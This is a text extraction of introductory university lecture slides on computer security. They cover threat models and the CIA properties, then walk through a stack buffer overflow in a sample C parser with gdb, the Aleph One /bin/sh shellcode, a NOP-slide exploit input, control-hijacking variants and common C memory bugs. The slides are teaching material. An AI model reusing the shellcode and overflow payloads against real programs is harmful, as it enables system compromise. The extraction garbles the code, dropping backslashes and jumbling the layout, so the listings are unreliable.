Day 1-1-intro-sw-vuls

Computer Security Course. Dawn Song

Introduction

Dawn Song 1

Intro to Instructor

Born in Dalian, China Prof., UC Berkeley
Close to Korea PhD, UC Berkeley Summer school
Prof., CMU

Sep, 2002 Jul, 2007 Aug, 2012

http://www.cs.berkeley.edu/~dawnsong
dawnsong@cs.berkeley.edu
Dawn Song 2

Research Interests & Projects
• Computer security & privacy
• BitBlaze: Binary analysis for computer security
• WebBlaze: New technologies to enhance web security
• DroidBlaze: Android security analysis infrastructure
• Machine learning & security
• Platform for private data

Dawn Song 3

BitBlaze: Computer Security via Program Binary Analysis
 Unified platform to accurately analyze security properties of binaries
 Security evaluation & audit of third-party code
 Defense against morphing threats
 Faster & deeper analysis of malware

Detecting Generating Dissecting
Vulnerabilities Filters Malware

BitBlaze Binary Analysis Infrastructure
Dawn Song 4

WebBlaze: New Security Technologies for the Web
• Does the browser correctly enforce desired security policy?
– Cross-origin capability leaks: attacks & defense [USENIX 09]
• Is third-party content such as malicious ads securely sandboxed?
– Preventing Capability Leaks in Secure JavaScript Subsets [NDSS10]
• Do browsers & servers have consistent interpretations/views to enforce
security properties?
– Document Structure Integrity: A Robust Basis for Cross-site Scripting Defense
[NDSS09]
– Content sniffing XSS: attacks & defense [IEEE S&P 09]
• Do applications have security vulnerabilities?
– Symbolic Execution Framework for JavaScript [IEEE S&P10]
• Do different web protocols interact securely?
– Model checking web protocols [CSF 10]
• How to build secure web applications by construction?
– Context-sensitive auto-sanitization in web applications [CCS 11]
• How to reduce TCB in web applications?
– Privilege Separation in HTML5 Applications [USENIX Security 12]
Dawn Song 5

DroidBlaze
Apps

Static App Runner VM
Analysis
Execution
Static Data Execution
Analyzer Exploration

App Dynamic
Rewriter Rewritten App Analysis

Behavior Analysis
Analyzed
Behavior Property
Apps
Analyzer Checker
Dawn Song 6

bitblaze.cs.berkeley.edu
webblaze.cs.berkeley.edu
droidblaze.cs.berkeley.edu

Intro of Students
• Name
• Institution
• Areas of interest
– Systems? Programming languages? AI? Theory?
• Background in computer security
– Have you taken a computer security class?
– Have you done research in computer security?
• Find partners for labs
Dawn Song 8

Overview of Lectures
• Syllabus

• Labs: hands-on experience

• TAs
– Dylan
– Taebum

Dawn Song 9

Overview of Lectures
Date/Time Topic Notes

Part 1: Software Security
Mon Aug 20 Software Security (I.1): Vulnerabilities, Attacks & Defenses. Different classes of
(09:00-12:00) vulnerabilities and attacks. Runtime defenses.
(13:00-18:00) Software Security (I.2): Deeper look at vulnerabilities and attacks (Lab Session)

Tues Aug 21 Software Security (II.1): Automatic vulnerability discovery. Static Analysis. Dynamic
(09:00-12:00) Analysis. Symbolic Execution
(13:00-18:00) Software Security (II.2): Tools for software security analysis and vulnerability discovery (Lab Session)

Part 2: Web Security
Wed Aug 22 Web Security (I.1): Vulnerabilities & attacks. Overview of web security. Different classes of
(09:00-12:00) web vulnerabilities and attacks
(13:00-18:00) Web Security (I.2): Vulnerabilities & attacks. Deeper look at web vulnerabilities & attacks (Lab Session)

Thurs Aug 23 Web Security (II.1): Automatic vulnerability discovery & defense. Automatic analysis
(09:00-12:00) techniques and tools to detect web vulnerabilities. New security primitives and
mechanisms for defenses
(13:00-18:00) Web Security (II.2): Automatic vulnerability discovery & defense. Deeper look at web (Lab Session)
defenses
Part 3: Malware and Mobile Security
Fri Aug 24 Malware and Mobile Security (1): Overview of malware. Worms and botnets. Overview of
(09:00-12:00) mobile security. Different classes of vulnerabilities & attacks. State-of-the-art defenses
(13:00-18:00) Dawn Song
Malware and Mobile Security (2): Deeper look at mobile vulnerabilities & attacks (Lab10
Session)


Introduction to Computer Security:
Goals & Threat Models

Dawn Song 11

What is Computer Security About?
• General goals:
– Allow intended use of computer systems
– Prevent unintended use that may cause harm
• Examples:
– Only share your photos & location with friends
– Don’t want attackers install key-logger on your
machine to steal your password

Dawn Song 12

Why Should You Care?
• It impacts your day-to-day life

Dawn Song 13

Why Should You Care?
• It impacts everybody’s day-to-day life
– Millions of computers compromised
– Millions of passwords stolen

Dawn Song 14

What is Computer Security About?
• General goals:
– Allow intended use of computer systems
– Prevent unintended use that may cause harm

• More precisely…

Dawn Song 15

Basic Security Properties: CIA

• Confidentiality
• Integrity
• Availability

Dawn Song 16

Basic Security Properties (I)
• Confidentiality:
– Information is only disclosed to authorized people or
systems
– E.g., attackers cannot learn your banking info

Dawn Song 17

Basic Security Properties (II)
• Integrity:
– Information cannot be tampered with in an
unauthorized way
– E.g., attacker cannot change the balance of your bank
account

Dawn Song 18

Basic Security Properties (III)
• Availability:
– Information and services are accessible in a timely
fashion to authorized people or systems
– E.g., you should be able to login and perform
transactions on your online banking account when
you want to

Dawn Song 19

Basic Security Properties: CIA

• Confidentiality
• Integrity
• Availability

Dawn Song 20

Security Analysis
• Given a computer system, one may ask:

Is the computer system secure?

Dawn Song 21

Is the House Secure?

Dawn Song 22

It Depends …
• What are the assets? What are the goals?

Dawn Song 23

It Depends …
• Threat model
– In SafeLand, you don’t need to lock the door
– Attackers who pick locks
– Attackers who drive a bull-dozer
– Attackers who have super advanced technology
– Attackers who may know you well

Dawn Song 24

Is the House Secure?
• Is the house’s protection mechanism strong
enough to protect the assets from attackers in
a certain threat model?

Dawn Song 25

Which Threat Model Should You Choose?

?

Dawn Song 26

Cost of Security
• Should you always build & evaluate a system
secure against the strongest attacker?
– A student may simply not be able to afford an alarm
system
• Not about perfect security

Perfect Security
Risk Analysis

Dawn Song 27

Is the Computer System Secure?
• Is the system’s protection mechanism strong
enough to protect the assets & achieve
security goals against attackers in a certain
threat model?

Dawn Song 28

Key Elements to Security Analysis
Security
properties

Security
Analysis ?
Threat
Model

Dawn Song 29

Threat Model
• Assumptions on attackers’ abilities and resources

Network
Eavesdropper
0Day

DES Cracker
DDoS

MITM Attack Dawn Song 30

Which Threat Models to Choose?
• For the grade database system for your class?
• For your phone?
• For a major online banking site?
• For the system to control nuclear weapon launch?

Dawn Song 31

Cost of Security
• There’s no free lunch.
• There’s no free security.
• Cost of security
– Expensive to develop
– Performance overhead
– Inconvenience to users

Dawn Song 32

Prioritize Your Security Solution
according to Your Threat Model
• No one wants to pay more for security than
what they have to lose
• Not about perfect security
– Risk analysis Perfect Security
Risk Analysis

Dawn Song 33

Changing Threat Model
• Be careful when your threat model changes
– E.g., online account

Over time….

New account, nothing of value;
Account accumulates value;
No incentive for attackers
More incentive for attackers

Dawn Song 34

Design Impacts Cost of Security
• Good system design & architecture can reduce
cost of security

Dawn Song 35

Design Impacts Cost of Security
Known unpatched vulnerabilities
Secunia SecurityFocus
Browser
Extremely critical Highly critical Moderately critical Less critical Not critical Total
(number / oldest) (number / oldest) (number / oldest) (number / oldest) (number / oldest) (number / oldest)

1
Google Chrome 16 0 0 0 0 0
13 December 2011

4 8 12 534
Internet Explorer 6 0 0
17 November 2004 27 February 2004 5 June 2003 20 November 2000

1 4 9 213
Internet Explorer 7 0 0
30 October 2006 6 June 2006 5 June 2003 15 August 2006

1 7 123
Internet Explorer 8 0 0 0
26 February 2007 5 June 2003 14 January 2009

1 26
Internet Explorer 9 0 0 0 0
6 December 2011 5 March 2011

1
Firefox 3.6 0 0 0 0 0
20 December 2011
Firefox 9 0 0 0 0 0 0
1 2
Opera 11 0 0 0 0
6 December 2011 6 December 2011

1 2
Safari 5 0 0 0 0
8 June 2010 13 December 2011

"Vulnerabilities." SecurityFocus. Web. 18 Jan. 2012. <http://www.securityfocus.com/>.
Dawn Song
"Advisories." Secunia. Web. 18 Jan. 2012. <https://secunia.com/community/advisories/>.
36


Software Security (I):
Buffer-overflow Attacks

Dawn Song 38

Intro

HTTP REQUEST

CLIENT HTTP RESPONSE

EXPLOIT

Remote
Shell

CLIENT ATTACKER SERVER
Dawn Song 39

Linux (32-bit) process memory layout
-0xFFFFFFFF
Reserved for Kernal
-0xC0000000
user stack
%esp

shared libraries
-0x40000000
brk
run time heap

static data segment
Loaded from exec
text segment (program)
-0x08048000
unused
-0x00000000

-0xC0000000 Stack Frame
To previous stack
frame pointer
user stack

arguments

return address
stack frame pointer
exception handlers
shared libraries To the point at which
-0x40000000
this function was called
local variables
run time heap
callee saved registers
static data
segment
text segment
(program)
-0x08048000
unused
-0x00000000

Stack Frame
1:void copy_lower (char* in, char* out) {
2: int i = 0;
3: while (in[i]!=‘0’ && in[i]!=‘n’) {
4: out[i] = tolower(in[i]);
5: i++;
6: }
7: buf[i] = ‘0’;
8:}
9:int parse(FILE *fp) {
10: char buf[5], *url, cmd[128];
11: fread(cmd, 1, 128, fp);
12: int header_ok = 0;
13: if (cmd[0] == ‘G’)
14: if (cmd[1] == ‘E’)
15: if (cmd[2] == ‘T’)
16: if (cmd[3] == ‘ ’)
17: header_ok = 1;
18: if (!header_ok) return -1;
19: url = cmd + 4;
20: copy_lower(url, buf);
21: printf(‚Location is %sn‛, buf);
22: return 0; }

A quick example to illustrate
multiple stack frames

Viewing Stack Frame with GDB
Our example modified to include
a main function
Compile: parse.c
gcc –g parse.c –o parse
2: int i = 0;
3: while (in[i]!=‘0’ && in[i]!=‘n’) {
4: out[i] = tolower(in[i]);
Run: 5: i++;
6: }
./parse 7: buf[i] = ‘0’;
8:}
9:int parse(FILE *fp) {
10: char buf[5], *url, cmd[128];
Debug: 11: fread(cmd, 1, 128, fp);
We can debug using gdb. 12: int header_ok = 0;
13: if (cmd[0] == ‘G’)
gdb parse 14: if (cmd[1] == ‘E’)
15: if (cmd[2] == ‘T’)
16: if (cmd[3] == ‘ ’)
Then we can take a look at the stack. 17: header_ok = 1;
18: if (!header_ok) return -1;
(gdb) break 7 19: url = cmd + 4;
(gdb) run 21: printf(‚Location is %sn‛, buf);
(gdb) x/64x $esp 22: return 0; }
23: /** main to load a file and run parse */

Viewing Stack Frame with GDB
Our running example modified to
illustrate multiple stack frames
Debug: parse.c
(gdb) x/64x $esp

What are buffer overflows?
parse’s
parse.c frame
2: int i = 0; 0xbffff760 0x0804a008
args fp
3: while (in[i]!=‘0’ && in[i]!=‘n’) {
4: out[i] = tolower(in[i]); 0xbffff75c 0x080485a2
ret address return address
5: i++;
0xbffff758 0xbffff778
frame ptr stack frame ptr
6: }
7: buf[i] = ‘0’; 0xbffff74c 0xbffff6c4 url
8:} 0xbffff748 0x00000001 header_ok
9:int parse(FILE *fp) { 0xbffff744 0xbfef20dc buf[4]
10: char buf[5], *url, cmd[128]; 0xbffff740 0xbf02224c
local variables buf[3,2,1,0]
11: fread(cmd, 1, 256, fp); 0xbffff73c 0x00000000 cmd[128,127,126,125]
. . .
12: int header_ok = 0; . . .
. . . .
. 0xbffff6c4 0x41414141
. cmd[7,6,5,4]
19: url = cmd + 4; 0xbffff6c0 0x20544547 cmd[3,2,1,0]
20: copy_lower(url, buf); 0xbffff74c callee saved
0xbffff6c4 url
21: printf(‚Location is %sn‛, buf); 0xbffff748 0x00000001 header_ok
22: return 0; } registers

0xbffff6b4 0xbffff740 out
args
0xbffff6b0 0xbffff6c4 in
file (input file)
0xbffff6ac ret address return address
0x080485a2
GET AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA frame ptr
0xbffff6a8 0xbffff758 stack frame ptr

0xbffff69c local variables i
0x00000000
callee saved
registers copy_lower’s
(Unallocated) frame

parse.c
2: int i = 0; 0xbffff760 0x0804a008 fp
3: while (in[i]!=‘0’ && in[i]!=‘n’) {
4: out[i] = tolower(in[i]); 0xbffff75c 0x080485a2 return address
5: i++;
0xbffff758 0xbffff778 stack frame ptr
6: }
10: char buf[5], *url, cmd[128]; 0xbffff740 0xbf022261 buf[3,2,1,0]
. . .
12: int header_ok = 0; . . .
. . . .
. 0xbffff6c4 0x41414141
. cmd[7,6,5,4]
20: copy_lower(url, buf); 0xbffff74c 0xbffff6c4 url
22: return 0; }
file (input file)
0xbffff6ac 0x080485a2 return address
GET AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

0xbffff69c 0x00000000 i

(Unallocated)

parse.c
2: int i = 0; 0xbffff760 0x0804a008 fp
3: while (in[i]!=‘0’ && in[i]!=‘n’) {
5: i++;
6: }
. . .
12: int header_ok = 0; . . .
. . . .
. 0xbffff6c4 0x41414141
. cmd[7,6,5,4]
22: return 0; }
file (input file)

0xbffff69c 0x00000001 i

(Unallocated)

parse.c
2: int i = 0; 0xbffff760 0x0804a008 fp
3: while (in[i]!=‘0’ && in[i]!=‘n’) {
5: i++;
6: }
. . .
12: int header_ok = 0; . . .
. . . .
. 0xbffff6c4 0x41414141
. cmd[7,6,5,4]
22: return 0; }
file (input file)

0xbffff69c 0x00000002 i

(Unallocated)

parse.c
2: int i = 0; 0xbffff760 0x0804a008 fp
3: while (in[i]!=‘0’ && in[i]!=‘n’) {
5: i++;
6: }
10: char buf[5], *url, cmd[128]; 0xbffff740 0x61616161 buf[3,2,1,0]
. . .
12: int header_ok = 0; . . .
. . . .
. 0xbffff6c4 0x41414141
. cmd[7,6,5,4]
22: return 0; }
file (input file)

0xbffff69c 0x00000003 i

(Unallocated)

parse.c
2: int i = 0; 0xbffff760 0x0804a008 fp
3: while (in[i]!=‘0’ && in[i]!=‘n’) {
5: i++;
6: }
9:int parse(FILE *fp) { 0xbffff744 0xbfef2061 buf[4]
. . .
12: int header_ok = 0; . . .
. . . .
. 0xbffff6c4 0x41414141
. cmd[7,6,5,4]
22: return 0; }
file (input file)

0xbffff69c 0x00000004 i

(Unallocated)

parse.c
2: int i = 0; 0xbffff760 0x0804a008 fp
3: while (in[i]!=‘0’ && in[i]!=‘n’) {
5: i++;
6: }
9:int parse(FILE *fp) { 0xbffff744 0xbfef6161 buf[4]
. . .
12: int header_ok = 0; . . .
. . . .
. 0xbffff6c4 0x41414141
. cmd[7,6,5,4]
22: return 0; }
file (input file)

0xbffff69c 0x00000005 i

Uh oh….
(Unallocated)

parse.c
2: int i = 0; 0xbffff760 0x0804a008 fp
3: while (in[i]!=‘0’ && in[i]!=‘n’) {
5: i++;
6: }
9:int parse(FILE *fp) { 0xbffff744 0xbf616161 buf[4]
. . .
12: int header_ok = 0; . . .
. . . .
. 0xbffff6c4 0x41414141
. cmd[7,6,5,4]
22: return 0; }
file (input file)

0xbffff69c 0x00000005 i

Uh oh….
(Unallocated)

parse.c
2: int i = 0; 0xbffff760 0x0804a008 fp
3: while (in[i]!=‘0’ && in[i]!=‘n’) {
5: i++;
6: }
7: buf[i] = ‘0’; 0xbffff74c 0x61616161 url
9:int parse(FILE *fp) { 0xbffff744 0x61616161 buf[4]
. . .
12: int header_ok = 0; . . .
. . . .
. 0xbffff6c4 0x41414141
. cmd[7,6,5,4]
22: return 0; }
file (input file)

0xbffff69c 0x0000000d i

Uh oh….
(Unallocated)

parse.c
2: int i = 0; 0xbffff760 0x61616161 fp
3: while (in[i]!=‘0’ && in[i]!=‘n’) {
4: out[i] = tolower(in[i]); 0xbffff75c 0x61616161 return address
5: i++;
0xbffff758 0x61616161 stack frame ptr
6: }
. . .
12: int header_ok = 0; . . .
. . . .
. 0xbffff6c4 0x41414141
. cmd[7,6,5,4]
22: return 0; }
file (input file)

0xbffff69c 0x00000019 i

Uh oh….
(Unallocated)

0x61616161
parse.c 0x61616161
0x61616161
2: int i = 0; 0xbffff760 0x61616161 fp
3: while (in[i]!=‘0’ && in[i]!=‘n’) {
5: i++;
6: }
. . .
12: int header_ok = 0; . . .
. . . .
. 0xbffff6c4 0x41414141
. cmd[7,6,5,4]
22: return 0; }
file (input file)

0xbffff69c 0x00000025 i

Uh oh….
(Unallocated)

0x61616161
parse.c 0x61616161
0x61616161
2: int i = 0; 0xbffff760 0x61616161 fp
3: while (in[i]!=‘0’ && in[i]!=‘n’) {
5: i++;
0xbffff758 stack frame ptr
6: } 0x61616161
7: buf[i] = ‘0’; 0xbffff74c url
8:} 0x61616161
0xbffff748 header_ok
0x61616161
9:int parse(FILE *fp) { 0xbffff744 buf[4]
0x61616161
10: char buf[5], *url, cmd[128]; 0xbffff740 buf[3,2,1,0]
0x61616161
11: fread(cmd, 1, 256, fp); 0xbffff73c cmd[128,127,126,125]
. 0x00000000 .
12: int header_ok = 0; . . .
. . . .
. 0xbffff6c4 .
. 0x41414141 cmd[7,6,5,4]
19: url = cmd + 4; 0xbffff6c0 cmd[3,2,1,0]
20: copy_lower(url, buf); 0x20544547
0xbffff74c url
21: printf(‚Location is %sn‛, buf); 0xbffff6c4
0xbffff748 header_ok
22: return 0; } 0x00000001

file (input file)

0xbffff69c 0x00000025 i
And when you try to return from parse…
… SEGFAULT, since 0x61616161 is not a
valid location to return to. (Unallocated)

Basic Stack Exploit
• Overwriting the return address allows an attacker to
redirect the flow of program control
• Instead of crashing, this can allow arbitrary code to be
executed
– Code segment called “shellcode”
• Example: the execve system call is used to execute a file
– With the correct permissions, execve(“/bin/sh”) can be used to
obtain a root-level shell.

Dawn Song 57

Shellcode of execve
• How to develop shellcode that runs as execve(“/bin/sh”)?

0x80002bc <__execve>: pushl %ebp
0x80002bd <__execve+1>: movl %esp,%ebp
void main() { 0x80002bf <__execve+3>: pushl %ebx
char *name[2]; The procedure prelude.
(disassembly of execve call)*
name[0] = "/bin/sh"; 0x80002c0 <__execve+4>: movl $0xb,%eax
name[1] = NULL; Copy 0xb (11 decimal) onto the stack. This is the
execve(name[0], name, NULL); index into the syscall table. 11 is execve.
} 0x80002c5 <__execve+9>: movl 0x8(%ebp),%ebx
Copy the address of "/bin/sh" into EBX.
(format instructions and data as characters)* 0x80002c8 <__execve+12>: movl 0xc(%ebp),%ecx
Copy the address of name[] into ECX.
0x80002cb <__execve+15>: movl 0x10(%ebp),%edx
Copy the address of the null pointer into %edx.

“xebx1fx5ex89x76x08x31xc0x88x46x46 0x80002ce <__execve+18>: int $0x80
x0cxb0x0bx89xf3x8dx4ex08x8dx56x0c
Change into kernel mode.
xcdx80x31xdbx89xd8x40xcdx80xe8xdcx
ffxffxff/bin/sh”
Dawn Song details, refer to Smashing the stack by aleph one
*For more 58

Basic Stack Exploit
So suppose we overflow with a string that looks like the assembly of:
Shell Code: exec(“/bin/sh”)
high
Program P ShellCode
To previous stack To previous stack
frame pointer frame pointer

arguments arguments

return address crafted return address
return address
return address
stack frame pointer stack frame pointer
To the instruction To the instruction at which
at which this this function was called
charbuffer
buf[128] function was called
buffer

low
Dan Boneh

“xebx1fx5ex89x76x08x31xc0x88x46x46x0cxb0x0bx89xf3x8dx4ex08x8dx56x0cxcdx80
x31xdbx89xd8x40xcdx80xe8xdcxffxffxff/bin/sh”

When the function exits, the user gets shell !!! (exact shell code by Aleph One)
Note: shellcode runs in stack.

Basic Stack Exploit
parse.c
2: int i = 0; 0xbffff760 0x0804a008 fp
3: while (in[i]!=‘0’ && in[i]!=‘n’) {
5: i++;
6: }
0xbffff744 0x61616161 buf[4]
9:int parse(FILE *fp) { 0xbffff740 0x61616161 buf[3,2,1,0]
10: char buf[5], *url, cmd[128]; 0xbffff73c 0x00000000 cmd[128,127,126,125
11: fread(cmd, 1, 256, fp); . . .
12: int header_ok = 0; . . .
. 0xbffff7d8 0xfffff764 cmd[25,26,27,28]
. . . .
.
19: url = cmd + 4; . . .
20: copy_lower(url, buf); 0xbffff6c4 0x41414141 cmd[7,6,5,4]
0xbffff6c0 0x20544547 cmd[3,2,1,0]
21: printf(‚Location is %sn‛, buf); 0xbffff74c 0xbffff6c4 url
22: return 0; } 0xbffff748 0x00000001 header_ok

file (input file)
GET
AAAAAAAAAAAAAAAAAAAAAAAAx64xf7xffxffAAAA 0xbffff6ac 0x080485a2 return address
xebx1fx5ex89x76x08x31xc0x88x46x46x0cxb0
x0bx89xf3x8dx4ex08x8dx56x0cxcdx80x31xdbx 0xbffff6a8 0xbffff758 stack frame ptr
89xd8x40xcdx80xe8xdcxffxffxff/bin/sh
0xbffff69c 0x00000019 i

(Unallocated)

Basic Stack Exploit OVERWRITE POINT!

parse.c
2: int i = 0; 0xbffff760 0x0804a008 fp
3: while (in[i]!=‘0’ && in[i]!=‘n’) {
5: i++;
6: }
0xbffff744 0x61616161 buf[4]
11: fread(cmd, 1, 256, fp); . . .
12: int header_ok = 0; . . .
. . . .
.
19: url = cmd + 4; . . .
0xbffff6c0 0x20544547 cmd[3,2,1,0]

file (input file)
GET
0xbffff69c 0x00000019 i

(Unallocated)


parse.c
2: int i = 0; 0xbffff760 0x0804a008 fp
3: while (in[i]!=‘0’ && in[i]!=‘n’) {
4: out[i] = tolower(in[i]); 0xbffff75c 0x0804f764 return address
5: i++;
6: }
0xbffff744 0x61616161 buf[4]
11: fread(cmd, 1, 256, fp); . . .
12: int header_ok = 0; . . .
. . . .
.
19: url = cmd + 4; . . .
0xbffff6c0 0x20544547 cmd[3,2,1,0]

file (input file)
GET
0xbffff69c 0x00000019 i

(Unallocated)


parse.c
2: int i = 0; 0xbffff760 0x0804a008 fp
3: while (in[i]!=‘0’ && in[i]!=‘n’) {
4: out[i] = tolower(in[i]); 0xbffff75c 0x08fff764 return address
5: i++;
6: }
0xbffff744 0x61616161 buf[4]
11: fread(cmd, 1, 256, fp); . . .
12: int header_ok = 0; . . .
. . . .
.
19: url = cmd + 4; . . .
0xbffff6c0 0x20544547 cmd[3,2,1,0]

file (input file)
GET
0xbffff69c 0x00000019 i

(Unallocated)


parse.c
0xbffff764
2: int i = 0; 0xbffff760 0x0804a008 fp
3: while (in[i]!=‘0’ && in[i]!=‘n’) {
4: out[i] = tolower(in[i]); 0xbffff75c 0xfffff764 return address
5: i++;
6: }
0xbffff744 0x61616161 buf[4]
11: fread(cmd, 1, 256, fp); . . .
12: int header_ok = 0; . . .
. . . .
.
19: url = cmd + 4; . . .
0xbffff6c0 0x20544547 cmd[3,2,1,0]

file (input file)
GET
0xbffff69c 0x00000019 i

(Unallocated)

Basic Stack Exploit ACTIVATE POINT!

parse.c shellcode
0xbffff764
2: int i = 0; 0xbffff760 0x61616161 fp
3: while (in[i]!=‘0’ && in[i]!=‘n’) {
4: out[i] = tolower(in[i]); 0xbffff75c 0xfffff764 return address
5: i++;
6: }
0xbffff744 0x61616161 buf[4]
11: fread(cmd, 1, 256, fp); . . .
12: int header_ok = 0; . . .
. . . .
.
19: url = cmd + 4; . . .
0xbffff6c0 0x20544547 cmd[3,2,1,0]

file (input file)
GET
0xbffff69c 0x00000019 i

(Unallocated)

The NOP Slide
Shellcode
----------------------------------------
NOP
NOP
To previous stack .
.
frame pointer .
NOP

arguments

stack frame pointer
To the instruction
at which this
buffer function was called buffer

Problem: how does attacker Solution: NOP slide
determine ret-address? • Guess approximate stack state when the function
is called
• Insert many NOPs before Shell Code ‘/x90’

The NOP Slide
parse.c
1:void copy_lower (char* in, char* out) { shellcode
2: int i = 0;
3: while (in[i]!=‘0’ && in[i]!=‘n’) { 0x90909090
4: out[i] = tolower(in[i]); 0x90909090
5: i++; .
.
6: } .
7: buf[i] = ‘0’; 0xbffff764 0x90909090
8:}
9:int parse(FILE *fp) { 0xbffff760 0x90909090 fp
10: char buf[5], *url, cmd[128]; return address
11: fread(cmd, 1, 256, fp); 0xbffff75c 0xfffff764
12: int header_ok = 0; stack frame ptr
. 0xbffff758 0x61616161
.
. 0xbffff74c url
19: url = cmd + 4; 0x61616161
0xbffff748 0x61616161 header_ok
21: printf(‚Location is %sn‛, buf); 0xbffff744 0x61616161 ?,?,?,buf[4]
22: return 0; } 0xbffff740 0x61616161 buf[3,2,1,0]
0xbffff73c 0x00000000 cmd[128,127,126,125]
23: /** main to load a file and run parse */ . . .
. . .
. . .
0xbffff6c4 0x41414141 cmd[7,6,5,4]
file (input file) 0xbffff6c0 0x20544547 cmd[3,2,1,0]
0xbffff74c 0xbffff6c4 url
GET 0xbffff748 0x00000001 header_ok
AAAAAAAAAAAAAAAAAAAAx64xf7xffxff/x90/x90/x90/x9
0/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x
90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/
x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90xebx1fx
5ex89x76x08x31xc0x88x46x46x0cxb0x0bx89xf3x8dx4 (copy_lower)
ex08x8dx56x0cxcdx80x31xdbx89xd8x40xcdx80xe8xdc
xffxffxff/bin/sh
(Unallocated)

More on Stack Smashing
• Some complications on Shellcode:
– Shellcode should not contain the ‘0’ character.
– Overflow should not crash program before the
frame’s function exits
• Sample remote stack smashing overflows:
– (2007) Overflow in Windows animated cursors
(ANI). LoadAniIcon()
– (2005) Overflow in Symantic Virus Detection
test.GetPrivateProfileString “file”, [long string]

Dawn Song 68

Many unsafe libc functions
strcpy (char *dest, const char *src)
strcat (char *de st, const char *src)
gets (char *s)
scanf ( const char *format, … ) and many more.
• “Safe” libc versions strncpy(), strncat() are misleading
– e.g. strncpy() may leave string unterminated.

• Windows C run time (CRT):
– strcpy_s (*dest, DestSize, *src): ensures proper termination

General Control Hijacking: Return Address

ShellCode
To previous stack
frame pointer

arguments arguments

return address
To the instruction at which
this function was called
buffer buffer

Overwrite Step: Overwrite return address to point to your code.

Activate Step: Return out of frame andDawn Song
into your code. 70

General Control Hijacking: Local Fn Ptr

ShellCode

arguments arguments

return address return address
To instructions for a
function
local function pointer crafted local function pointer
local function pointer
buffer buffer

Overwrite Step: Overwrite local function pointer to point to your code.

Activate Step: Call that local function variable. Song
Dawn 71

General Control Hijacking:
Function Pointer in the Heap

Object T vtable Object T vtable
ptr FP1: method #1 ptr FP1:
crafted FP1: shellcode
method #1
FP2: method #2 FP2:
crafted FP2: method #2
shellcode
data FP3: method #3 data FP3:
crafted FP3: method #3
shellcode

buffer buffer

Overwrite Step: Overwrite entries in a vtable for Object T.

Activate Step: Call any method from Object T Song
Dawn 72

General Control Hijacking:
Function Pointer in the Heap
(crafted vtable) crafted FP1: shellcode
crafted FP2: shellcode
Object T vtable crafted FP3: shellcode
vtable
ptr FP1: method #1 crafted ptr
ptr FP1: method #1
FP2: method #2 FP2: method #2
data FP3: method #3 data FP3: method #3

buffer buffer

Overwrite Step: Overwrite pointer to vtable on heap to point to a crafted vtable.

Activate Step: Call any method from Object T Song
Dawn 73

Attack: return-to-libc (arc injection)
• Control hijacking without executing code
(stack)
(libc.so)

arguments

return address exec()
stack frame pointer printf()

buffer “/bin/shell”

Dawn Song 74

General Control Hijacking

Control Flow Pointer expected code
return address
frame pointer function pointer as
exception Handler local variable
shellcode, library
jump to address longjmp pointer
(return to libc)
function pointer in heap

Overwrite Step:
Find some way to modify a Control Flow Pointer to point to your shellcode, library
entry point, or other code of interest.

Activate Step:
Find some way to activate that modified Control Flow Pointer.

Dawn Song 75

Instances of Control Hijacking
Location in Control Flow How to activate
Memory
Pointer
Stack Return Address Return from
function
(stack frame)
Stack Frame Pointer Return from Ret Addr
function Frame Ptr
exception handers
Stack Function Pointers Reference and call local fn ptrs
as local variables function pointer
buf
Stack Exception Handler Trigger Exception

Heap Function pointer in Reference and call
Object T vtable Object T vtable
heap (i.e. method function pointer
ptr FP1: method #1 ptr FP1: method #1
of an object) FP2: method #2 FP2: method #2
data FP3: method #3 data FP3: method #3

buf buf
Anywhere setjmp and longjmp Call longjmp
program state longjmp saved pointer
buffer …
other data

buf
Dawn Song 76

Data Hijacking
Modifying data in a way not intended Example: Authentication variable

arguments arguments
arguments

return address return address
return address
stack frame pointer

authentication_variable authentication_variable
authentication_variable
buffer buffer
buffer

Normal Situation:
Exploited Situation:
User types in a password which is stored in the to overflow if the user is successfully
long enough buffer, and buffer and into the
authenticated, the authentication_variableSong
authentication_variable. The user Dawn is set.
is now unintentionally authenticated. 77


Software Security (II):
Other types of software vulnerabilities

Dawn Song 78

Common Coding Errors
• Input validation vulnerabilities

• Memory management vulnerabilities

• TOCTTOU vulnerabilities

Dawn Song 79

Input validation vulnerabilities
• Program requires certain assumptions on
inputs to run properly
• Without correct checking for inputs
– Program gets exploited
• Example:
– Buffer overflow
– Format string

Dawn Song 80

Example I
unsigned int size;
Data **datalist;

size = GetUntrustedSizeValue();
datalist = (data **)malloc(size * sizeof(Data *));
for(int i=0; i<size; i++) {
datalist[i] = InitData();
}
datalist[size] = NULL;
...

Dawn Song 81

Example II
• char buf[80];
void vulnerable() {
int len = read_int_from_network();
char *p = read_string_from_network();
if (len > sizeof buf) {
error("length too large, nice try!");
return;
}
memcpy(buf, p, len);
}
• What's wrong with this code?
• Hint – memcpy() prototype:
– void *memcpy(void *dest, const void *src, size_t n);
• Definition of size_t: typedef unsigned int size_t;
• Do you see it now?
Dawn Song 82

Implicit Casting Bug
• Attacker provides a negative value for len
– if won’t notice anything wrong
– Execute memcpy() with negative third arg
– Third arg is implicitly cast to an unsigned int, and
becomes a very large positive int
– memcpy() copies huge amount of memory into buf,
yielding a buffer overrun!
• A signed/unsigned or an implicit casting bug
– Very nasty – hard to spot
• C compiler doesn’t warn about type mismatch
between signed int and unsigned int
– Silently inserts an implicit cast
Dawn Song 83

Example III (Integer Overflow)
• size_t len = read_int_from_network();
char *buf;
buf = malloc(len+5);
read(fd, buf, len);
...
• What’s wrong with this code?
– No buffer overrun problems (5 spare bytes)
– No sign problems (all ints are unsigned)
• But, len+5 can overflow if len is too large
– If len = 0xFFFFFFFF, then len+5 is 4
– Allocate 4-byte buffer then read a lot more than 4
bytes into it: classic buffer overrun!
• Know programming language’s semantics well to
avoid pitfalls Dawn Song 84

Example IV
char* ptr = (char*)malloc (SIZE);
if (err) {
abrt = 1;
free(ptr);
}
...
if (abrt) {
logError("operation aborted before commit", ptr);
}
• Use-after-free
• Corrupt memory

http://cwe.mitre.org Dawn Song 85

Example IV
char* ptr = (char*)malloc (SIZE);
...
if (abrt) {
free(ptr);
}
...
free(ptr);

• Double-free error
• Corrupts memory-management data structure

